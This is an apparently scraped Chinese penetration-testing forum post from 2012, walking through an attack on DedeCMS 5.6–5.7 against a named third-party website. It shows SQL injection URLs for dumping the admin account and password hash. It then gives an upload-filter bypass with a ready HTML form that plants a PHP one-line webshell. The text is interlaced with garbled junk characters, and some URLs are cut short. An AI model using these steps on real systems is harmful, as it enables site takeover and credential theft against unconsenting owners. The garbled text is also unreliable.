中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]
作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
, m7 `& r, d$ O这站 http://www.political-security.com/0 l6 J/ V' D' g& m
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间," ]! o+ T% X! \+ s! L  ]8 Z
www.political-security.com/data/mysql_error_trace.inc 爆后台$ B) L' I7 o7 N% [" T9 m# y- @0 }
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。: E# f) `( G# F) \8 L7 ^
然后写上语句 # u4 |; i  ~1 H; l' ]* @; @
查看管理员帐号$ g! U! {' K5 n4 B
http://www.political-security.co ... &membergroup=@`( d- H: B( a, A( P: Y7 |/ a
& M9 s9 E5 ^4 J% `, y0 @' k$ l) i. c
admin 9 ?, P% E: z5 d* l1 Y: {6 a. t7 H
7 O' f/ L9 O6 R" S$ \8 l% h
查看管理员密码
; h2 g# R1 G& L" `2 ] http://www.political-security.co ... &membergroup=@`1 d. s( n" }1 j' Y/ Q
8 E3 e, H: O7 V  j& |
8d29b1ef9f8c5a5af429' X& {4 p9 q3 p: [8 q0 e

2 ?, Y! \' b8 O3 j% {/ u查看管理员密码
2 I8 w2 a& M: F7 V/ t) s3 }8 q5 ?' |; Z5 g! n, O& f' Q
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5. D( [: s" }) n. h: F% {
2 |. d3 ~: O7 S( {; L) k4 w9 k
8d2
3 d- m1 b3 Q4 `( ~9b1ef9f8c5a5af42. v: O0 {7 f( R5 J  F
9  F! x' \# N" S. X# L% |
; ~  G* X% ~4 m! L8 g7 z5 q
cmd5没解出来 只好测试第二个方法
( l. r1 V: e* l; e4 V5 K3 M1 O& d  E" v+ a  K5 ?
& o9 K6 T: f6 ~* W
②上传漏洞:
$ x) Q4 b# h6 @. ?1 {% d; V4 _" m- R. c6 x- ~. |+ d9 ?
只要登陆会员中心,然后访问页面链接8 |) V! g; x1 R3 U  y$ {
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”" T: m1 y& s1 q5 f
4 i8 `$ o) X! Q  }( g, z7 c
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”1 F( R/ M* b  t/ u/ C9 M4 w
: C# d4 k' ]& l3 t  _
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm2 @# O4 L+ s% b. E+ l5 D1 r+ I% o

) u5 O8 U; s! y6 E& K. U2 Z; s+ [<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>) d# F3 a9 G" A/ ~
或者
  y0 v( n- I  m% O3 |6 [即可上传成功



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2